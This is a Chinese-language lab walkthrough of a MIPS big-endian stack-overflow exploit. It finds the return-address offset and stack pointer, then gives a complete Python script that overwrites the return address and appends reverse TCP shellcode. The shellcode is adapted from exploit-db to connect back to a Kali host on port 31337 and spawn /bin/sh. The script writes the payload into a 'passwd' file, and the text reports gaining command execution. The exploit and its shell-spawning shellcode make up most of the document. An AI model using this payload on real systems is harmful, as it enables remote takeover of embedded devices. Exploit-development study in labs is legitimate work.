MIPS Reverse TCP Exploit Shellcode
首先还是先调试确定一下offset和sp值

在main函数的返回处设置断点

执行过来后,查看寄存器值,返回地址RA被覆盖为BBBB,此时栈帧指向0x7FFFEE98

可以设置将BBBB(RA)值覆盖为CCCC(SP)地址,即0x7FFFEE98
因为此程序是大端序的

在exploit-db中找到一个Big Endian的shellcode
参考链接 https://www.exploit-db.com/exploits/45541
这段代码默认是连接到192.168.2.157:31337端口
将IP地址修改为Kali机器地址 192.168.197.143,端口号不变

修改后的代码如下
#/usr/bin/env python import struct print '[*] prepare shellcode ', shellcode = "A"*0x19C shellcode += struct.pack(">L", 0x7FFFEE98) #SP address(PC) shellcode += "\x24\x0f\xff\xfa" # li $t7, -6 shellcode += "\x01\xe0\x78\x27" # nor $t7, $zero shellcode += "\x21\xe4\xff\xfd" # addi $a0, $t7, -3 shellcode += "\x21\xe5\xff\xfd" # addi $a1, $t7, -3 shellcode += "\x28\x06\xff\xff" # slti $a2, $zero, -1 shellcode += "\x24\x02\x10\x57" # li $v0, 4183 ( sys_socket ) shellcode += "\x01\x01\x01\x0c" # syscall 0x40404 shellcode += "\xaf\xa2\xff\xff" # sw $v0, -1($sp) shellcode += "\x8f\xa4\xff\xff" # lw $a0, -1($sp) shellcode += "\x34\x0f\xff\xfd" # li $t7, -3 ( sa_family = AF_INET ) shellcode += "\x01\xe0\x78\x27" # nor $t7, $zero shellcode += "\xaf\xaf\xff\xe0" # sw $t7, -0x20($sp) # ================ You can change port here ================= */ shellcode += "\x3c\x0e\x7a\x69" # lui $t6, 0x7a69 ( sin_port = 0x7a69 == 31337 ) # ============================================================ */ shellcode += "\x35\xce\x7a\x69" # ori $t6, $t6, 0x7a69 shellcode += "\xaf\xae\xff\xe4" # sw $t6, -0x1c($sp) # ================ You can change ip here ================= */ shellcode += "\x3c\x0e\xc0\xa8" # lui $t6, 0xc0a8 ( sin_addr = 0xc0a8 == 192.168 shellcode += "\x35\xce\xc5\x8f" # ori $t6, $t6, 0xc58f 0xc58f == 197.143 # ============================================================ */ shellcode += "\xaf\xae\xff\xe6" # sw $t6, -0x1a($sp) shellcode += "\x27\xa5\xff\xe2" # addiu $a1, $sp, -0x1e shellcode += "\x24\x0c\xff\xef" # li $t4, -17 ( addrlen = 16 ) shellcode += "\x01\x80\x30\x27" # nor $a2, $t4, $zero shellcode += "\x24\x02\x10\x4a" # li $v0, 4170 ( sys_connect ) shellcode += "\x01\x01\x01\x0c" # syscall 0x40404 shellcode += "\x24\x0f\xff\xfd" # li t7,-3 shellcode += "\x01\xe0\x28\x27" # nor a1,t7,zero shellcode += "\x8f\xa4\xff\xff" # lw $a0, -1($sp) # dup2_loop: shellcode += "\x24\x02\x0f\xdf" # li $v0, 4063 ( sys_dup2 ) shellcode += "\x01\x01\x01\x0c" # syscall 0x40404 shellcode += "\x24\xa5\xff\xff" # addi a1,a1,-1 (\x20\xa5\xff\xff) shellcode += "\x24\x01\xff\xff" # li at,-1 shellcode += "\x14\xa1\xff\xfb" # bne a1,at, dup2_loop shellcode += "\x28\x06\xff\xff" # slti $a2, $zero, -1 shellcode += "\x3c\x0f\x2f\x2f" # lui $t7, 0x2f2f shellcode += "\x35\xef\x62\x69" # ori $t7, $t7, 0x6269 shellcode += "\xaf\xaf\xff\xec" # sw $t7, -0x14($sp) shellcode += "\x3c\x0e\x6e\x2f" # lui $t6, 0x6e2f shellcode += "\x35\xce\x73\x68" # ori $t6, $t6, 0x7368 shellcode += "\xaf\xae\xff\xf0" # sw $t6, -0x10($sp) shellcode += "\xaf\xa0\xff\xf4" # sw $zero, -0xc($sp) shellcode += "\x27\xa4\xff\xec" # addiu $a0, $sp, -0x14 shellcode += "\xaf\xa4\xff\xf8" # sw $a0, -8($sp) shellcode += "\xaf\xa0\xff\xfc" # sw $zero, -4($sp) shellcode += "\x27\xa5\xff\xf8" # addiu $a1, $sp, -8 shellcode += "\x24\x02\x0f\xab" # li $v0, 4011 (sys_execve) shellcode += "\x01\x01\x01\x0c" # syscall 0x40404 print ' ok' print '[+] create passwd file ', fw = open('passwd','w') fw.write(shellcode) fw.close() print ' ok'
执行此py程序,在Kali端开启端口监听,然后执行vuln_system函数,可以看到错误提示,并且程序中断下来,说明正在监听

在Kali端监听,虽然没有回显,但是已经可以执行命令了
